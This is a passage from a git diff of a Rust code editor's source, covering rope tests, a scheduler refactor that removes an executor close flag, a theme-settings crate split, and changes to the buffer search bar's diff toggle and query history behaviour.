assert_eq!(rope.len(), expected.len()); + + let actual_summary = rope.summary(); + let expected_summary = TextSummary::from(expected.as_str()); + assert_eq!( + actual_summary.len, expected_summary.len, + "len mismatch for {:?}", + expected + ); + assert_eq!( + actual_summary.lines, expected_summary.lines, + "lines mismatch for {:?}", + expected + ); + assert_eq!( + actual_summary.chars, expected_summary.chars, + "chars mismatch for {:?}", + expected + ); + assert_eq!( + actual_summary.longest_row, expected_summary.longest_row, + "longest_row mismatch for {:?}", + expected + ); + + // Verify offset-to-point and point-to-offset round-trip at boundaries. + for (ix, _) in expected.char_indices().chain(Some((expected.len(), '\0'))) { + assert_eq!( + rope.point_to_offset(rope.offset_to_point(ix)), + ix, + "offset round-trip failed at {} for {:?}", + ix, + expected + ); + } + } + } + + #[gpui::test(iterations = 50)] + fn test_push_front_large_prefix(mut rng: StdRng) { + let initial_len = rng.random_range(0..=32); + let initial_text: String = RandomCharIter::new(&mut rng).take(initial_len).collect(); + let mut rope = Rope::from(initial_text.as_str()); + + let prefix_len = rng.random_range(64..=256); + let prefix: String = RandomCharIter::new(&mut rng).take(prefix_len).collect(); + + rope.push_front(&prefix); + let expected = format!("{}{}", prefix, initial_text); + + assert_eq!(rope.text(), expected); + assert_eq!(rope.len(), expected.len()); + + let actual_summary = rope.summary(); + let expected_summary = TextSummary::from(expected.as_str()); + assert_eq!(actual_summary.len, expected_summary.len); + assert_eq!(actual_summary.lines, expected_summary.lines); + assert_eq!(actual_summary.chars, expected_summary.chars); + } + fn clip_offset(text: &str, mut offset: usize, bias: Bias) -> usize { while !text.is_char_boundary(offset) { match bias { diff --git a/crates/rpc/src/message_stream.rs b/crates/rpc/src/message_stream.rs index 023e916df3113e73adafdc0d38948121ad2e9cec..34888d98147124c5c971843d0124fceb95e47cde 100644 --- a/crates/rpc/src/message_stream.rs +++ b/crates/rpc/src/message_stream.rs @@ -7,7 +7,6 @@ use futures::{SinkExt as _, StreamExt as _}; use proto::Message as _; use std::time::Instant; use std::{fmt::Debug, io}; -use zstd::zstd_safe::WriteBuf; const KIB: usize = 1024; const MIB: usize = KIB * 1024; @@ -87,7 +86,10 @@ where let received_at = Instant::now(); match bytes? { WebSocketMessage::Binary(bytes) => { - zstd::stream::copy_decode(bytes.as_slice(), &mut self.encoding_buffer)?; + zstd::stream::copy_decode( + zstd::zstd_safe::WriteBuf::as_slice(&*bytes), + &mut self.encoding_buffer, + )?; let envelope = Envelope::decode(self.encoding_buffer.as_slice()) .map_err(io::Error::from)?; diff --git a/crates/rules_library/Cargo.toml b/crates/rules_library/Cargo.toml index 59c298de923f98135c99fca0c8da2fa42ac2e17e..352f86bd72fca294745cc0f74b401cc48f35d7fd 100644 --- a/crates/rules_library/Cargo.toml +++ b/crates/rules_library/Cargo.toml @@ -28,7 +28,7 @@ release_channel.workspace = true rope.workspace = true serde.workspace = true settings.workspace = true -theme.workspace = true +theme_settings.workspace = true ui.workspace = true ui_input.workspace = true util.workspace = true diff --git a/crates/rules_library/src/rules_library.rs b/crates/rules_library/src/rules_library.rs index a89657e29680ccfd759fe63efcc837d883ef7590..425f7d2aa3d9e9259fe005a0e15dee10e4e4baf1 100644 --- a/crates/rules_library/src/rules_library.rs +++ b/crates/rules_library/src/rules_library.rs @@ -1,6 +1,6 @@ use anyhow::Result; use collections::{HashMap, HashSet}; -use editor::{CompletionProvider, SelectionEffects}; +use editor::SelectionEffects; use editor::{CurrentLineHighlight, Editor, EditorElement, EditorEvent, EditorStyle, actions::Tab}; use gpui::{ App, Bounds, DEFAULT_ADDITIONAL_WINDOW_SIZE, Entity, EventEmitter, Focusable, PromptLevel, @@ -15,12 +15,11 @@ use picker::{Picker, PickerDelegate}; use platform_title_bar::PlatformTitleBar; use release_channel::ReleaseChannel; use rope::Rope; -use settings::Settings; -use std::rc::Rc; +use settings::{ActionSequence, Settings}; use std::sync::Arc; use std::sync::atomic::AtomicBool; use std::time::Duration; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{Divider, ListItem, ListItemSpacing, ListSubHeader, Tooltip, prelude::*}; use ui_input::ErasedEditor; use util::{ResultExt, TryFutureExt}; @@ -76,7 +75,6 @@ pub trait InlineAssistDelegate { pub fn open_rules_library( language_registry: Arc, inline_assist_delegate: Box, - make_completion_provider: Rc Rc>, prompt_to_select: Option, cx: &mut App, ) -> Task>> { @@ -141,7 +139,6 @@ pub fn open_rules_library( store, language_registry, inline_assist_delegate, - make_completion_provider, prompt_to_select, window, cx, @@ -162,7 +159,6 @@ pub struct RulesLibrary { picker: Entity>, pending_load: Task<()>, inline_assist_delegate: Box, - make_completion_provider: Rc Rc>, _subscriptions: Vec, } @@ -222,13 +218,17 @@ impl PickerDelegate for RulePickerDelegate { cx.notify(); } - fn can_select(&mut self, ix: usize, _: &mut Window, _: &mut Context>) -> bool { + fn can_select(&self, ix: usize, _: &mut Window, _: &mut Context>) -> bool { match self.filtered_entries.get(ix) { Some(RulePickerEntry::Rule(_)) => true, Some(RulePickerEntry::Header(_)) | Some(RulePickerEntry::Separator) | None => false, } } + fn select_on_hover(&self) -> bool { + false + } + fn placeholder_text(&self, _window: &mut Window, _cx: &mut App) -> Arc { "Search…".into() } @@ -393,7 +393,7 @@ impl PickerDelegate for RulePickerDelegate { })) })) .when(!prompt_id.is_built_in(), |this| { - this.end_hover_slot( + this.end_slot_on_hover( h_flex() .child( IconButton::new("delete-rule", IconName::Trash) @@ -471,7 +471,6 @@ impl RulesLibrary { store: Entity, language_registry: Arc, inline_assist_delegate: Box, - make_completion_provider: Rc Rc>, rule_to_select: Option, window: &mut Window, cx: &mut Context, @@ -514,7 +513,6 @@ impl RulesLibrary { active_rule_id: None, pending_load: Task::ready(()), inline_assist_delegate, - make_completion_provider, _subscriptions: vec![cx.subscribe_in(&picker, window, Self::handle_picker_event)], picker, } @@ -721,7 +719,6 @@ impl RulesLibrary { } else if let Some(rule_metadata) = self.store.read(cx).metadata(prompt_id) { let language_registry = self.language_registry.clone(); let rule = self.store.read(cx).load(prompt_id, cx); - let make_completion_provider = self.make_completion_provider.clone(); self.pending_load = cx.spawn_in(window, async move |this, cx| { let rule = rule.await; let markdown = language_registry.language_for_name("Markdown").await; @@ -756,7 +753,6 @@ impl RulesLibrary { editor.set_show_indent_guides(false, cx); editor.set_use_modal_editing(true); editor.set_current_line_highlight(Some(CurrentLineHighlight::None)); - editor.set_completion_provider(Some(make_completion_provider())); if focus { window.focus(&editor.focus_handle(cx), cx); } @@ -1159,10 +1155,11 @@ impl RulesLibrary { Button::new("new-rule", "New Rule") .full_width() .style(ButtonStyle::Outlined) - .icon(IconName::Plus) - .icon_size(IconSize::Small) - .icon_position(IconPosition::Start) - .icon_color(Color::Muted) + .start_icon( + Icon::new(IconName::Plus) + .size(IconSize::Small) + .color(Color::Muted), + ) .on_click(|_, window, cx| { window.dispatch_action(Box::new(NewRule), cx); }), @@ -1391,13 +1388,20 @@ impl RulesLibrary { impl Render for RulesLibrary { fn render(&mut self, window: &mut Window, cx: &mut Context) -> impl IntoElement { - let ui_font = theme::setup_ui_font(window, cx); + let ui_font = theme_settings::setup_ui_font(window, cx); let theme = cx.theme().clone(); client_side_decorations( v_flex() .id("rules-library") .key_context("RulesLibrary") + .on_action( + |action_sequence: &ActionSequence, window: &mut Window, cx: &mut App| { + for action in &action_sequence.0 { + window.dispatch_action(action.boxed_clone(), cx); + } + }, + ) .on_action(cx.listener(|this, &NewRule, window, cx| this.new_rule(window, cx))) .on_action( cx.listener(|this, &DeleteRule, window, cx| { diff --git a/crates/scheduler/src/executor.rs b/crates/scheduler/src/executor.rs index 05ea973c4ece53f996b732a7e8c3673487f3b8dc..602404142a1f4d19bbce841b3b06996cc2a7427b 100644 --- a/crates/scheduler/src/executor.rs +++ b/crates/scheduler/src/executor.rs @@ -6,10 +6,7 @@ use std::{ panic::Location, pin::Pin, rc::Rc, - sync::{ - Arc, - atomic::{AtomicBool, Ordering}, - }, + sync::Arc, task::{Context, Poll}, thread::{self, ThreadId}, time::Duration, @@ -19,7 +16,6 @@ use std::{ pub struct ForegroundExecutor { session_id: SessionId, scheduler: Arc, - closed: Arc, not_send: PhantomData>, } @@ -28,7 +24,6 @@ impl ForegroundExecutor { Self { session_id, scheduler, - closed: Arc::new(AtomicBool::new(false)), not_send: PhantomData, } } @@ -41,16 +36,6 @@ impl ForegroundExecutor { &self.scheduler } - /// Returns the closed flag for this executor. - pub fn closed(&self) -> &Arc { - &self.closed - } - - /// Close this executor. Tasks will not run after this is called. - pub fn close(&self) { - self.closed.store(true, Ordering::SeqCst); - } - #[track_caller] pub fn spawn(&self, future: F) -> Task where @@ -60,13 +45,12 @@ impl ForegroundExecutor { let session_id = self.session_id; let scheduler = Arc::clone(&self.scheduler); let location = Location::caller(); - let closed = self.closed.clone(); let (runnable, task) = spawn_local_with_source_location( future, move |runnable| { scheduler.schedule_foreground(session_id, runnable); }, - RunnableMeta { location, closed }, + RunnableMeta { location }, ); runnable.schedule(); Task(TaskState::Spawned(task)) @@ -129,25 +113,11 @@ impl ForegroundExecutor { #[derive(Clone)] pub struct BackgroundExecutor { scheduler: Arc, - closed: Arc, } impl BackgroundExecutor { pub fn new(scheduler: Arc) -> Self { - Self { - scheduler, - closed: Arc::new(AtomicBool::new(false)), - } - } - - /// Returns the closed flag for this executor. - pub fn closed(&self) -> &Arc { - &self.closed - } - - /// Close this executor. Tasks will not run after this is called. - pub fn close(&self) { - self.closed.store(true, Ordering::SeqCst); + Self { scheduler } } #[track_caller] @@ -167,9 +137,8 @@ impl BackgroundExecutor { { let scheduler = Arc::clone(&self.scheduler); let location = Location::caller(); - let closed = self.closed.clone(); let (runnable, task) = async_task::Builder::new() - .metadata(RunnableMeta { location, closed }) + .metadata(RunnableMeta { location }) .spawn( move |_| future, move |runnable| { @@ -188,20 +157,16 @@ impl BackgroundExecutor { F::Output: Send + 'static, { let location = Location::caller(); - let closed = self.closed.clone(); let (tx, rx) = flume::bounded::>(1); self.scheduler.spawn_realtime(Box::new(move || { while let Ok(runnable) = rx.recv() { - if runnable.metadata().is_closed() { - continue; - } runnable.run(); } })); let (runnable, task) = async_task::Builder::new() - .metadata(RunnableMeta { location, closed }) + .metadata(RunnableMeta { location }) .spawn( move |_| future, move |runnable| { @@ -372,8 +337,9 @@ where impl Drop for Checked { fn drop(&mut self) { - assert!( - self.id == thread_id(), + assert_eq!( + self.id, + thread_id(), "local task dropped by a thread that didn't spawn it. Task spawned at {}", self.location ); diff --git a/crates/scheduler/src/scheduler.rs b/crates/scheduler/src/scheduler.rs index 5b1fac258d088d3be7a2254bbf68431cdb507c70..05d285df8d9622ac901618f5543d2f219290ee0d 100644 --- a/crates/scheduler/src/scheduler.rs +++ b/crates/scheduler/src/scheduler.rs @@ -14,10 +14,7 @@ use std::{ future::Future, panic::Location, pin::Pin, - sync::{ - Arc, - atomic::{AtomicBool, Ordering}, - }, + sync::Arc, task::{Context, Poll}, time::Duration, }; @@ -62,23 +59,12 @@ impl Priority { pub struct RunnableMeta { /// The source location where the task was spawned. pub location: &'static Location<'static>, - /// Shared flag indicating whether the scheduler has been closed. - /// When true, tasks should be dropped without running. - pub closed: Arc, -} - -impl RunnableMeta { - /// Returns true if the scheduler has been closed and this task should not run. - pub fn is_closed(&self) -> bool { - self.closed.load(Ordering::SeqCst) - } } impl std::fmt::Debug for RunnableMeta { fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { f.debug_struct("RunnableMeta") .field("location", &self.location) - .field("closed", &self.is_closed()) .finish() } } diff --git a/crates/scheduler/src/test_scheduler.rs b/crates/scheduler/src/test_scheduler.rs index 03a8c0b90c77e4c17bd8a1130e5c82ccd935e80f..5a14f9c335bfaaa16cbac2344a2d89dd585225a7 100644 --- a/crates/scheduler/src/test_scheduler.rs +++ b/crates/scheduler/src/test_scheduler.rs @@ -57,7 +57,7 @@ impl TestScheduler { .map(|seed| seed.parse().unwrap()) .unwrap_or(0); - (seed..num_iterations as u64) + (seed..seed + num_iterations as u64) .map(|seed| { let mut unwind_safe_f = AssertUnwindSafe(&mut f); eprintln!("Running seed: {seed}"); @@ -320,10 +320,6 @@ impl TestScheduler { }; if let Some(runnable) = runnable { - // Check if the executor that spawned this task was closed - if runnable.runnable.metadata().is_closed() { - return true; - } let is_foreground = runnable.session_id.is_some(); let was_main_thread = self.state.lock().is_main_thread; self.state.lock().is_main_thread = is_foreground; @@ -335,6 +331,28 @@ impl TestScheduler { false } + /// Drops all runnable tasks from the scheduler. + /// + /// This is used by the leak detector to ensure that all tasks have been dropped as tasks may keep entities alive otherwise. + /// Why do we even have tasks left when tests finish you may ask. The reason for that is simple, the scheduler itself is the executor and it retains the scheduled runnables. + /// A lot of tasks, including every foreground task contain an executor handle that keeps the test scheduler alive, causing a reference cycle, thus the need for this function right now. + pub fn drain_tasks(&self) { + // dropping runnables may reschedule tasks + // due to drop impls with executors in them + // so drop until we reach a fixpoint + loop { + let mut state = self.state.lock(); + if state.runnables.is_empty() && state.timers.is_empty() { + break; + } + let runnables = std::mem::take(&mut state.runnables); + let timers = std::mem::take(&mut state.timers); + drop(state); + drop(timers); + drop(runnables); + } + } + pub fn advance_clock_to_next_timer(&self) -> bool { if let Some(timer) = self.state.lock().timers.first() { self.clock.advance(timer.expiration - self.clock.now()); diff --git a/crates/scheduler/src/tests.rs b/crates/scheduler/src/tests.rs index dc24fed68d7cb1c83953f4de38bb4392d3b61029..03fe8075f91fff2d72b9bb1c0d4d389a69d9c3bf 100644 --- a/crates/scheduler/src/tests.rs +++ b/crates/scheduler/src/tests.rs @@ -290,6 +290,31 @@ fn test_helper_methods() { assert_eq!(results, vec![10, 10, 10]); } +#[test] +fn test_many_with_arbitrary_seed() { + for seed in [0u64, 1, 5, 42] { + let mut seeds_seen = Vec::new(); + let iterations = 3usize; + + for current_seed in seed..seed + iterations as u64 { + let scheduler = Arc::new(TestScheduler::new(TestSchedulerConfig::with_seed( + current_seed, + ))); + let captured_seed = current_seed; + scheduler + .foreground() + .block_on(async { seeds_seen.push(captured_seed) }); + scheduler.run(); + } + + assert_eq!( + seeds_seen, + (seed..seed + iterations as u64).collect::>(), + "Expected {iterations} iterations starting at seed {seed}" + ); + } +} + #[test] fn test_block_with_timeout() { // Test case: future completes within timeout diff --git a/crates/schema_generator/Cargo.toml b/crates/schema_generator/Cargo.toml index b92298a3b41d62b861c19a1f22ceaee0d63828b5..71beb54597e72286cbf539897741088dde873e6c 100644 --- a/crates/schema_generator/Cargo.toml +++ b/crates/schema_generator/Cargo.toml @@ -17,3 +17,4 @@ serde.workspace = true serde_json.workspace = true settings.workspace = true theme.workspace = true +theme_settings.workspace = true \ No newline at end of file diff --git a/crates/schema_generator/src/main.rs b/crates/schema_generator/src/main.rs index a77060c54d1361dc96204238a282f8e75946a37b..d34cd897b9e7eb27b6c9343513d85ed8497d291a 100644 --- a/crates/schema_generator/src/main.rs +++ b/crates/schema_generator/src/main.rs @@ -2,7 +2,8 @@ use anyhow::Result; use clap::{Parser, ValueEnum}; use schemars::schema_for; use settings::ProjectSettingsContent; -use theme::{IconThemeFamilyContent, ThemeFamilyContent}; +use theme::IconThemeFamilyContent; +use theme_settings::ThemeFamilyContent; #[derive(Parser, Debug)] pub struct Args { diff --git a/crates/search/Cargo.toml b/crates/search/Cargo.toml index 9613bd720919d77f2e7c9421ed51a0b18edf7355..4213aa39a046e944cd34f9a1530bd15d1c442863 100644 --- a/crates/search/Cargo.toml +++ b/crates/search/Cargo.toml @@ -7,7 +7,7 @@ license = "GPL-3.0-or-later" [features] test-support = [ - "client/test-support", + "editor/test-support", "gpui/test-support", "workspace/test-support", @@ -31,12 +31,14 @@ futures.workspace = true gpui.workspace = true language.workspace = true menu.workspace = true +multi_buffer.workspace = true project.workspace = true serde.workspace = true serde_json.workspace = true settings.workspace = true smol.workspace = true theme.workspace = true +theme_settings.workspace = true ui.workspace = true util.workspace = true util_macros.workspace = true @@ -47,7 +49,6 @@ ztracing.workspace = true tracing.workspace = true [dev-dependencies] -client = { workspace = true, features = ["test-support"] } editor = { workspace = true, features = ["test-support"] } gpui = { workspace = true, features = ["test-support"] } language = { workspace = true, features = ["test-support"] } diff --git a/crates/search/src/buffer_search.rs b/crates/search/src/buffer_search.rs index 9ec4a8259f5d92b41ef8e3fc300bb23d8503b301..46177c5642a8d05daaf22e9fb24b205cd10ca42b 100644 --- a/crates/search/src/buffer_search.rs +++ b/crates/search/src/buffer_search.rs @@ -6,8 +6,9 @@ use crate::{ ToggleCaseSensitive, ToggleRegex, ToggleReplace, ToggleSelection, ToggleWholeWord, buffer_search::registrar::WithResultsOrExternalQuery, search_bar::{ - ActionButtonState, alignment_element, filter_search_results_input, input_base_styles, - render_action_button, render_text_input, + ActionButtonState, HistoryNavigationDirection, alignment_element, + filter_search_results_input, input_base_styles, render_action_button, render_text_input, + should_navigate_history, }, }; use any_vec::AnyVec; @@ -15,12 +16,13 @@ use collections::HashMap; use editor::{ Editor, EditorSettings, MultiBufferOffset, SplittableEditor, ToggleSplitDiff, actions::{Backtab, FoldAll, Tab, ToggleFoldAll, UnfoldAll}, + scroll::Autoscroll, }; use futures::channel::oneshot; use gpui::{ - App, ClickEvent, Context, Entity, EventEmitter, Focusable, InteractiveElement as _, - IntoElement, KeyContext, ParentElement as _, Render, ScrollHandle, Styled, Subscription, Task, - WeakEntity, Window, div, + Action as _, App, ClickEvent, Context, Entity, EventEmitter, Focusable, + InteractiveElement as _, IntoElement, KeyContext, ParentElement as _, Render, ScrollHandle, + Styled, Subscription, Task, WeakEntity, Window, div, }; use language::{Language, LanguageRegistry}; use project::{ @@ -31,7 +33,9 @@ use project::{ use fs::Fs; use settings::{DiffViewStyle, Settings, update_settings_file}; use std::{any::TypeId, sync::Arc}; -use zed_actions::{outline::ToggleOutline, workspace::CopyPath, workspace::CopyRelativePath}; +use zed_actions::{ + OpenSettingsAt, outline::ToggleOutline, workspace::CopyPath, workspace::CopyRelativePath, +}; use ui::{ BASE_REM_SIZE_IN_PX, IconButtonShape, PlatformStyle, TextSize, Tooltip, prelude::*, @@ -108,47 +112,39 @@ impl Render for BufferSearchBar { .as_ref() .and_then(|weak| weak.upgrade()) .map(|splittable_editor| { - let is_split = splittable_editor.read(cx).is_split(); + let editor_ref = splittable_editor.read(cx); + let diff_view_style = editor_ref.diff_view_style(); + + let is_split_set = diff_view_style == DiffViewStyle::Split; + let is_split_active = editor_ref.is_split(); + let min_columns = + EditorSettings::get_global(cx).minimum_split_diff_width as u32; + + let split_icon = if is_split_set && !is_split_active { + IconName::DiffSplitAuto + } else { + IconName::DiffSplit + }; + h_flex() .gap_1() .child( IconButton::new("diff-unified", IconName::DiffUnified) - .shape(IconButtonShape::Square) - .toggle_state(!is_split) - .tooltip(Tooltip::element(move |_, cx| { - v_flex() - .gap_1() - .child(Label::new("Unified")) - .child( - h_flex() - .gap_0p5() - .text_sm() - .text_color(Color::Muted.color(cx)) - .children(render_modifiers( - &gpui::Modifiers::secondary_key(), - PlatformStyle::platform(), - None, - Some(TextSize::Default.rems(cx).into()), - false, - )) - .child("click to set as default"), - ) - .into_any() - })) + .icon_size(IconSize::Small) + .toggle_state(diff_view_style == DiffViewStyle::Unified) + .tooltip(Tooltip::text("Unified")) .on_click({ let splittable_editor = splittable_editor.downgrade(); move |_, window, cx| { - if window.modifiers().secondary() { - update_settings_file( - ::global(cx), - cx, - |settings, _| { - settings.editor.diff_view_style = - Some(DiffViewStyle::Unified); - }, - ); - } - if is_split { + update_settings_file( + ::global(cx), + cx, + |settings, _| { + settings.editor.diff_view_style = + Some(DiffViewStyle::Unified); + }, + ); + if diff_view_style == DiffViewStyle::Split { splittable_editor .update(cx, |editor, cx| { editor.toggle_split( @@ -163,26 +159,32 @@ impl Render for BufferSearchBar { }), ) .child( - IconButton::new("diff-split", IconName::DiffSplit) - .shape(IconButtonShape::Square) - .toggle_state(is_split) + IconButton::new("diff-split", split_icon) + .toggle_state(diff_view_style == DiffViewStyle::Split) + .icon_size(IconSize::Small) .tooltip(Tooltip::element(move |_, cx| { + let message = if is_split_set && !is_split_active { + format!("Split when wider than {} columns", min_columns) + .into() + } else { + SharedString::from("Split") + }; + v_flex() - .gap_1() - .child(Label::new("Split")) + .child(message) .child( h_flex() .gap_0p5() - .text_sm() + .text_ui_sm(cx) .text_color(Color::Muted.color(cx)) .children(render_modifiers( &gpui::Modifiers::secondary_key(), PlatformStyle::platform(), None, - Some(TextSize::Default.rems(cx).into()), + Some(TextSize::Small.rems(cx).into()), false, )) - .child("click to set as default"), + .child("click to change min width"), ) .into_any() })) @@ -190,6 +192,14 @@ impl Render for BufferSearchBar { let splittable_editor = splittable_editor.downgrade(); move |_, window, cx| { if window.modifiers().secondary() { + window.dispatch_action( + OpenSettingsAt { + path: "minimum_split_diff_width".to_string(), + } + .boxed_clone(), + cx, + ); + } else { update_settings_file( ::global(cx), cx, @@ -198,17 +208,17 @@ impl Render for BufferSearchBar { Some(DiffViewStyle::Split); }, ); - } - if !is_split { - splittable_editor - .update(cx, |editor, cx| { - editor.toggle_split( - &ToggleSplitDiff, - window, - cx, - ); - }) - .ok(); + if diff_view_style == DiffViewStyle::Unified { + splittable_editor + .update(cx, |editor, cx| { + editor.toggle_split( + &ToggleSplitDiff, + window, + cx, + ); + }) + .ok(); + } } } }), @@ -236,7 +246,7 @@ impl Render for BufferSearchBar { let collapse_expand_icon_button = |id| { IconButton::new(id, icon) - .shape(IconButtonShape::Square) + .icon_size(IconSize::Small) .tooltip(move |_, cx| { Tooltip::for_action_in( tooltip_label, @@ -281,6 +291,7 @@ impl Render for BufferSearchBar { regex, replacement, selection, + select_all, find_in_results, } = self.supported_options(cx); @@ -339,13 +350,11 @@ impl Render for BufferSearchBar { }; let query_column = input_style - .child( - div() - .flex_1() - .min_w(px(0.)) - .overflow_hidden() - .child(render_text_input(&self.query_editor, color_override, cx)), - ) + .child(div().flex_1().min_w_0().py_1().child(render_text_input( + &self.query_editor, + color_override, + cx, + ))) .child( h_flex() .flex_none() @@ -453,14 +462,16 @@ impl Render for BufferSearchBar { )) }); - el.child(render_action_button( - "buffer-search-nav-button", - IconName::SelectAll, - Default::default(), - "Select All Matches", - &SelectAllMatches, - query_focus, - )) + el.when(select_all, |el| { + el.child(render_action_button( + "buffer-search-nav-button", + IconName::SelectAll, + Default::default(), + "Select All Matches", + &SelectAllMatches, + query_focus.clone(), + )) + }) .child(matches_column) }) .when(find_in_results, |el| { @@ -486,39 +497,42 @@ impl Render for BufferSearchBar { .child(query_column) .child(mode_column); - let replace_line = - should_show_replace_input.then(|| { - let replace_column = input_base_styles(replacement_border) - .child(render_text_input(&self.replacement_editor, None, cx)); - let focus_handle = self.replacement_editor.read(cx).focus_handle(cx); - - let replace_actions = h_flex() - .min_w_64() - .gap_1() - .child(render_action_button( - "buffer-search-replace-button", - IconName::ReplaceNext, - Default::default(), - "Replace Next Match", - &ReplaceNext, - focus_handle.clone(), - )) - .child(render_action_button( - "buffer-search-replace-button", - IconName::ReplaceAll, - Default::default(), - "Replace All Matches", - &ReplaceAll, - focus_handle, - )); + let replace_line = should_show_replace_input.then(|| { + let replace_column = input_base_styles(replacement_border).child( + div() + .flex_1() + .py_1() + .child(render_text_input(&self.replacement_editor, None, cx)), + ); + let focus_handle = self.replacement_editor.read(cx).focus_handle(cx); + + let replace_actions = h_flex() + .min_w_64() + .gap_1() + .child(render_action_button( + "buffer-search-replace-button", + IconName::ReplaceNext, + Default::default(), + "Replace Next Match", + &ReplaceNext, + focus_handle.clone(), + )) + .child(render_action_button( + "buffer-search-replace-button", + IconName::ReplaceAll, + Default::default(), + "Replace All Matches", + &ReplaceAll, + focus_handle, + )); - h_flex() - .w_full() - .gap_2() - .when(has_collapse_button, |this| this.child(alignment_element())) - .child(replace_column) - .child(replace_actions) - }); + h_flex() + .w_full() + .gap_2() + .when(has_collapse_button, |this| this.child(alignment_element())) + .child(replace_column) + .child(replace_actions) + }); let mut key_context = KeyContext::new_with_defaults(); key_context.add("BufferSearchBar"); @@ -833,13 +847,13 @@ impl BufferSearchBar { cx: &mut Context, ) -> Self { let query_editor = cx.new(|cx| { - let mut editor = Editor::single_line(window, cx); + let mut editor = Editor::auto_height(1, 4, window, cx); editor.set_use_autoclose(false); editor }); cx.subscribe_in(&query_editor, window, Self::on_query_editor_event) .detach(); - let replacement_editor = cx.new(|cx| Editor::single_line(window, cx)); + let replacement_editor = cx.new(|cx| Editor::auto_height(1, 4, window, cx)); cx.subscribe(&replacement_editor, Self::on_replacement_editor_event) .detach(); @@ -975,7 +989,9 @@ impl BufferSearchBar { if deploy.focus { let mut handle = self.query_editor.focus_handle(cx); let mut select_query = true; - if deploy.replace_enabled && handle.is_focused(window) { + + let has_seed_text = self.query_suggestion(window, cx).is_some(); + if deploy.replace_enabled && has_seed_text { handle = self.replacement_editor.focus_handle(cx); select_query = false; }; @@ -1188,6 +1204,7 @@ impl BufferSearchBar { let len = query_buffer.len(cx); query_buffer.edit([(MultiBufferOffset(0)..len, query)], None, cx); }); + query_editor.request_autoscroll(Autoscroll::fit(), cx); }); self.set_search_options(options, cx); self.clear_matches(window, cx); @@ -1706,15 +1723,19 @@ impl BufferSearchBar { window: &mut Window, cx: &mut Context, ) { + if !should_navigate_history(&self.query_editor, HistoryNavigationDirection::Next, cx) { + cx.propagate(); + return; + } + if let Some(new_query) = self .search_history .next(&mut self.search_history_cursor) .map(str::to_string) { drop(self.search(&new_query, Some(self.search_options), false, window, cx)); - } else { - self.search_history_cursor.reset(); - drop(self.search("", Some(self.search_options), false, window, cx)); + } else if let Some(draft) = self.search_history_cursor.take_draft() { + drop(self.search(&draft, Some(self.search_options), false, window, cx)); } } @@ -1724,6 +1745,11 @@ impl BufferSearchBar { window: &mut Window, cx: &mut Context, ) { + if !should_navigate_history(&self.query_editor, HistoryNavigationDirection::Previous, cx) { + cx.propagate(); + return; + } + if self.query(cx).is_empty() && let Some(new_query) = self .search_history @@ -1734,9 +1760,10 @@ impl BufferSearchBar { return; } + let current_query = self.query(cx); if let Some(new_query) = self .search_history - .previous(&mut self.search_history_cursor) + .previous(&mut self.search_history_cursor, ¤t_query) .map(str::to_string) { drop(self.search(&new_query, Some(self.search_options), false, window, cx)); @@ -1892,7 +1919,7 @@ mod tests { cx.set_global(store); editor::init(cx); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); crate::init(cx); }); } @@ -2718,13 +2745,13 @@ mod tests { assert_eq!(search_bar.search_options, SearchOptions::CASE_SENSITIVE); }); - // Next history query after the latest should set the query to the empty string. + // Next history query after the latest should preserve the current query. search_bar.update_in(cx, |search_bar, window, cx| { search_bar.next_history_query(&NextHistoryQuery, window, cx); }); cx.background_executor.run_until_parked(); search_bar.update(cx, |search_bar, cx| { - assert_eq!(search_bar.query(cx), ""); + assert_eq!(search_bar.query(cx), "c"); assert_eq!(search_bar.search_options, SearchOptions::CASE_SENSITIVE); }); search_bar.update_in(cx, |search_bar, window, cx| { @@ -2732,17 +2759,17 @@ mod tests { }); cx.background_executor.run_until_parked(); search_bar.update(cx, |search_bar, cx| { - assert_eq!(search_bar.query(cx), ""); + assert_eq!(search_bar.query(cx), "c"); assert_eq!(search_bar.search_options, SearchOptions::CASE_SENSITIVE); }); - // First previous query for empty current query should set the query to the latest. + // Previous query should navigate backwards through history. search_bar.update_in(cx, |search_bar, window, cx| { search_bar.previous_history_query(&PreviousHistoryQuery, window, cx); }); cx.background_executor.run_until_parked(); search_bar.update(cx, |search_bar, cx| { - assert_eq!(search_bar.query(cx), "c"); + assert_eq!(search_bar.query(cx), "b"); assert_eq!(search_bar.search_options, SearchOptions::CASE_SENSITIVE); }); @@ -2752,7 +2779,7 @@ mod tests { }); cx.background_executor.run_until_parked(); search_bar.update(cx, |search_bar, cx| { - assert_eq!(search_bar.query(cx), "b"); + assert_eq!(search_bar.query(cx), "a"); assert_eq!(search_bar.search_options, SearchOptions::CASE_SENSITIVE); }); @@ -2833,11 +2860,71 @@ mod tests { }); cx.background_executor.run_until_parked(); search_bar.update(cx, |search_bar, cx| { - assert_eq!(search_bar.query(cx), ""); + assert_eq!(search_bar.query(cx), "ba"); assert_eq!(search_bar.search_options, SearchOptions::NONE); }); } + #[perf] + #[gpui::test] + async fn test_search_query_history_autoscroll(cx: &mut TestAppContext) { + let (_editor, search_bar, cx) = init_test(cx); + + // Add a long multi-line query that exceeds the editor's max + // visible height (4 lines), then a short query. + let long_query = "line1\nline2\nline3\nline4\nline5\nline6"; + search_bar + .update_in(cx, |search_bar, window, cx| { + search_bar.search(long_query, None, true, window, cx) + }) + .await + .unwrap(); + search_bar + .update_in(cx, |search_bar, window, cx| { + search_bar.search("short", None, true, window, cx) + }) + .await + .unwrap(); + + // Navigate back to the long entry. Since "short" is single-line, + // the history navigation is allowed. + search_bar.update_in(cx, |search_bar, window, cx| { + search_bar.previous_history_query(&PreviousHistoryQuery, window, cx); + }); + cx.background_executor.run_until_parked(); + search_bar.update(cx, |search_bar, cx| { + assert_eq!(search_bar.query(cx), long_query); + }); + + // The cursor should be scrolled into view despite the content + // exceeding the editor's max visible height. + search_bar.update_in(cx, |search_bar, window, cx| { + let snapshot = search_bar + .query_editor + .update(cx, |editor, cx| editor.snapshot(window, cx)); + let cursor_row = search_bar + .query_editor + .read(cx) + .selections + .newest_display(&snapshot) + .head() + .row(); + let scroll_top = search_bar + .query_editor + .update(cx, |editor, cx| editor.scroll_position(cx).y); + let visible_lines = search_bar + .query_editor + .read(cx) + .visible_line_count() + .unwrap_or(0.0); + let scroll_bottom = scroll_top + visible_lines; + assert!( + (cursor_row.0 as f64) < scroll_bottom, + "cursor row {cursor_row:?} should be visible 